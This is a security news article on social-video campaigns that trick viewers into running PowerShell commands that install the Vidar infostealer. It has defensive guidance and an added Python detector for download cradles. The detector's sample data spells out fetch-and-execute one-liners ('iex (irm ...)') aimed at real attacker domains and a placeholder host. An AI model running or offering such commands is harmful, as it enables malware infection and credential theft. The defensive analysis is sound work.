Cybercriminals are increasingly turning short-form video platforms into malware distribution channels, using polished fake tutorials on TikTok and Instagram Reels to trick users into installing malicious software. The latest campaign lures viewers with promises of free premium apps such as Spotify Premium or Microsoft Word, but the real payload is Vidar stealer, a long-running malware-as-a-service operation known for stealing credentials, financial data, and session tokens.
The activity was analyzed by ReversingLabs researcher Zaria Vuksan, who documented two separate campaign styles that exploited recommendation algorithms and user engagement to scale quickly across both platforms. The research shows how attackers are adapting classic social engineering techniques to social video ecosystems where “how-to” content looks routine and trusted.
Key Details
According to ReversingLabs, both campaigns had the same objective: get victims either to visit third-party download sites or to paste a command, with both paths ultimately delivering malware disguised as free software. What changed between the two methods was the trust-building strategy: one leaned on highly polished tutorial branding, while the other relied on casual "proof" videos and comment bait to build curiosity before redirecting users to malicious links.
In the first campaign, attackers used accounts with names such as “windows.tips” and “windows.insights”, plus blue-and-white profile imagery that mimicked Microsoft’s visual identity. The videos used clean graphics and AI-generated voiceovers to walk viewers through entering a PowerShell command that supposedly unlocked Spotify Premium, when in reality it pulled and executed malicious code from attacker-controlled infrastructure such as msget[.]run.
The second campaign took a more informal approach. Instead of overt tutorials, the threat actors posted short videos showing premium Spotify features while using trending music and vague captions meant to trigger comments. Once users asked how the software was obtained for free, the attackers replied with directions to sites such as pluginchad[.]xyz, maxapk[.]xyz, or d4ug[.]site, the latter presenting fake offers to “unlock premium games & AI tools.”
What made the operation especially effective was scale. ReversingLabs observed videos surpassing 100,000 views, with some samples showing more saves than likes—a meaningful signal because saves, shares, and comments carry strong weight in social recommendation systems. In one example, a lure video drew 109,000 views, 1,699 saves, 1,581 likes, and 974 shares, demonstrating how easily malicious content can blend into mainstream engagement patterns.
Technical Analysis
The most dangerous aspect of the first campaign was its reliance on the victim to run the first stage. The command shown in the tutorial combined irm (the PowerShell alias for Invoke-RestMethod) with iex (the alias for Invoke-Expression): irm fetches the remote script as a string and iex executes it inside the current PowerShell process, a pattern commonly called a download cradle. No exploit is involved and the script never has to be saved as a file, so the technique hides malicious delivery behind a legitimate Windows administration feature. In practical terms, the victim becomes the initial execution mechanism by copying and pasting instructions that appear harmless or even helpful.
From a MITRE ATT&CK perspective, the campaign maps closely to T1059.001 (Command and Scripting Interpreter: PowerShell) and T1204 (User Execution), specifically the T1204.004 (Malicious Copy and Paste) sub-technique, with remote payload retrieval also fitting T1105 (Ingress Tool Transfer). The malware identified in the first campaign was Vidar stealer, delivered as build.exe with the SHA-256 hash 03bbc4fa1fd784276da135ab62fef85aaddea66e6eb176d7e59c3398f818b153.
Vidar remains a serious threat because it is both accessible and capable. ReversingLabs described it as a popular malware-as-a-service offering that steals credentials, financial information, and tokens, while Trend Micro reported that Vidar 2.0—released in October 2025—was rewritten in C, added multithreaded data theft, and improved anti-analysis and evasion features. That combination makes it attractive to threat actors who want a low-cost, mature infostealer with strong operational support.
The social delivery mechanism matters just as much as the malware itself. ReversingLabs found that attackers are deliberately optimizing for how social platforms reward engagement. Tutorials naturally attract saves and shares, while vague “look what I got for free” videos provoke comments and follow-up questions. That means the recommendation engine effectively amplifies the campaign before defenders—or the platform—can respond.
Impact and Risks
The risk extends far beyond individual users chasing pirated software. Vidar stealer can harvest browser credentials, session cookies, tokens, financial data, and other sensitive information that may later be used for account takeover, fraud, or corporate intrusion. If an employee runs one of these commands on a work device, the result could be a direct path into enterprise SaaS accounts, internal portals, and cloud environments.
This also creates a difficult visibility problem for defenders. Unlike traditional phishing, there may be no malicious email, attachment, or suspicious URL delivered through standard channels. The weaponized content exists as spoken or visual instructions inside a social media post, making many traditional email and web security controls less effective at stopping the initial compromise.
ReversingLabs also found that reporting and community moderation are not reliable safeguards. Researchers said their attempts to report malicious Instagram accounts as scams were rejected, while attackers could simply delete warning comments and block users who tried to alert others. That delays takedowns and gives campaigns more time to spread.
Expert Recommendations
Organizations should immediately expand security awareness training to cover social media as an attack vector, not just email and SMS. Employees need to understand that copy-pasting terminal or PowerShell commands from TikTok, Instagram Reels, YouTube Shorts, Reddit, or Discord is inherently risky—especially when the content promises free access to paid software or “activation” shortcuts.
Security teams should also tighten installation permissions and application control on managed endpoints. ReversingLabs specifically advised auditing who can install software on work devices. Defenders should additionally monitor for suspicious PowerShell activity, in particular command lines and script blocks that feed Invoke-RestMethod or Invoke-WebRequest output into Invoke-Expression (iex irm and its variants), outbound connections to known malicious domains such as msget[.]run or slmgr[.]sh, and execution of files whose hashes match known Vidar samples. Because pasted one-liners leave little on disk, PowerShell script block logging (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log) is what makes the first stage visible at all; domain indicators rotate quickly, so detections should key on the behavior rather than on the hostnames alone.
Additional controls should include EDR detections for script-based payload delivery, browser credential theft behavior, and token exfiltration, alongside multi-factor authentication and session hygiene for high-value accounts. Because infostealers often target browser sessions and stored credentials, organizations should also review cookie theft response playbooks and ensure rapid invalidation of exposed sessions.
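As an added example (not code from the ReversingLabs research or from the original article), the following Python shows the detection logic the Technical Analysis and recommendations above describe: it expands the PowerShell aliases iex, irm and iwr to their cmdlet names, flags script blocks in which a remote fetch is handed to Invoke-Expression in either ordering, and checks the contacted host against the domains named in this article. The sample script blocks are constructed to look like Event ID 4104 ScriptBlockText values and are not real telemetry; example.invalid is a placeholder host, not an indicator from the report.

```python
"""Flag PowerShell download cradles (iex/irm pattern) in script block text.

Added illustration only: the alias table and regexes are this example's
own, and the sample script blocks below are constructed, not real logs.
"""
import re
from dataclasses import dataclass
from typing import List, Optional
from urllib.parse import urlparse

# Short aliases that tutorials use so the pasted command fits on screen and
# slips past string matches on the full cmdlet names. (Windows PowerShell
# 5.1 also aliases curl/wget to Invoke-WebRequest; add them if you need to.)
ALIASES = {
    "iex": "Invoke-Expression",
    "irm": "Invoke-RestMethod",
    "iwr": "Invoke-WebRequest",
}
_ALIAS_RE = re.compile(r"\b(" + "|".join(ALIASES) + r")\b", re.IGNORECASE)
_URL_RE = re.compile(r"https?://[^\s'\"()|;]+", re.IGNORECASE)

# Hosts the article names as attacker infrastructure, with the defanging
# brackets removed so they match what appears in real script blocks.
IOC_HOSTS = {"msget.run", "slmgr.sh", "pluginchad.xyz", "maxapk.xyz", "d4ug.site"}


@dataclass
class Finding:
    normalized: str      # script block with aliases expanded to cmdlet names
    is_cradle: bool      # remote fetch whose output reaches Invoke-Expression
    url: Optional[str]
    host: Optional[str]
    ioc_hit: bool        # host is on the IOC list


def normalize(script: str) -> str:
    """Expand iex/irm/iwr to their cmdlet names, case-insensitively."""
    return _ALIAS_RE.sub(lambda m: ALIASES[m.group(1).lower()], script)


def analyze(script: str) -> Finding:
    """Classify one script block. Both orderings are caught:
    `iex (irm <url>)` and `irm <url> | iex`."""
    norm = normalize(script)
    lowered = norm.lower()
    fetches = "invoke-restmethod" in lowered or "invoke-webrequest" in lowered
    executes = "invoke-expression" in lowered
    match = _URL_RE.search(norm)
    url = match.group(0) if match else None
    host = urlparse(url).hostname if url else None
    return Finding(
        normalized=norm,
        is_cradle=fetches and executes and url is not None,
        url=url,
        host=host,
        ioc_hit=host is not None and host in IOC_HOSTS,
    )


def scan(script_blocks: List[str]) -> List[Finding]:
    """Return a Finding for every block that is a download cradle."""
    return [f for f in map(analyze, script_blocks) if f.is_cradle]


# Constructed Event ID 4104 ScriptBlockText values; example.invalid is a
# placeholder host, not an indicator from the article.
SAMPLE_SCRIPT_BLOCKS = [
    "iex (irm https://msget.run/spotify)",
    'IEX(IRM "http://slmgr.sh/w")',
    "irm 'https://example.invalid/install.ps1' | iex",
    "Invoke-RestMethod -Uri https://api.github.com/repos -Method Get",
    "Get-ChildItem C:\\Users | Select-Object Name",
    'iex "Get-Date"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_SCRIPT_BLOCKS):
        label = "KNOWN-IOC" if f.ioc_hit else "unknown-host"
        print(f"[{label}] {f.host}: {f.normalized}")
```

Running the file prints the three cradles and labels the two whose hosts match the article's indicators; the plain Invoke-RestMethod call and the local iex "Get-Date" are not flagged, because the rule requires both a remote fetch and Invoke-Expression in the same block. The unknown-host case is the one that matters operationally: it fires on the behavior even when the attacker has moved to a fresh domain. Encoded or string-concatenated variants will slip past this textual check, which is why the logic belongs on script block logging, where PowerShell records each block as it is actually compiled, rather than on the raw command line alone.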
Industry Context
This campaign fits a broader pattern: malware operators are shifting toward trust-based delivery instead of relying solely on exploits or classic phishing emails. In May 2025, researchers documented TikTok videos that pushed users to execute malicious PowerShell commands to install Vidar and StealC, showing that short-form social content had already emerged as a viable malware channel before the newly documented TikTok and Instagram campaigns.
The bigger trend is clear. Attackers no longer need a zero-day to infect users at scale if they can hijack recommendation systems, mimic trusted branding, and exploit the credibility generated by views, likes, saves, and comments. As generative AI lowers the cost of producing voiceovers, visuals, and copy at scale, campaigns like this are likely to become more frequent and harder to distinguish from legitimate creator content.
Conclusion
The latest ReversingLabs findings show that TikTok and Instagram Reels are no longer just social platforms—they are becoming active malware delivery surfaces. By combining persuasive fake tutorials, engagement-driven distribution, and a proven infostealer like Vidar, threat actors have created a social engineering model that is cheap, scalable, and alarmingly effective.
For defenders, the lesson is straightforward: treat social video content that promotes “free” premium tools or asks users to run system commands with the same suspicion once reserved for phishing emails. The delivery channel has changed, but the outcome—credential theft and downstream compromise—remains the same.
FAQ SECTION
1. What is the TikTok malware scam?
The TikTok malware scam refers to fake tutorial videos that promise free premium software but actually direct users to run malicious commands or download infected files, often leading to Vidar stealer infections.
2. How does Instagram Reels malware spread in this campaign?
Attackers post short, convincing clips that attract comments and curiosity, then reply with malicious links or redirect users to fake software-download sites such as pluginchad[.]xyz and d4ug[.]site.
3. What does Vidar stealer do after infection?
Vidar steals credentials, browser data, financial information, and session tokens, which can be used for fraud, account takeover, or follow-on attacks against organizations.
4. Why are these social media malware campaigns effective?
They blend into normal social media behavior, exploit recommendation algorithms, and use views, likes, saves, shares, and comments to build credibility before delivering the malicious payload.
5. How can organizations defend against fake software tutorial attacks?
They should restrict installation rights, monitor PowerShell and script execution, train employees on social media threats, deploy EDR for infostealer behavior, and aggressively report malicious accounts and domains.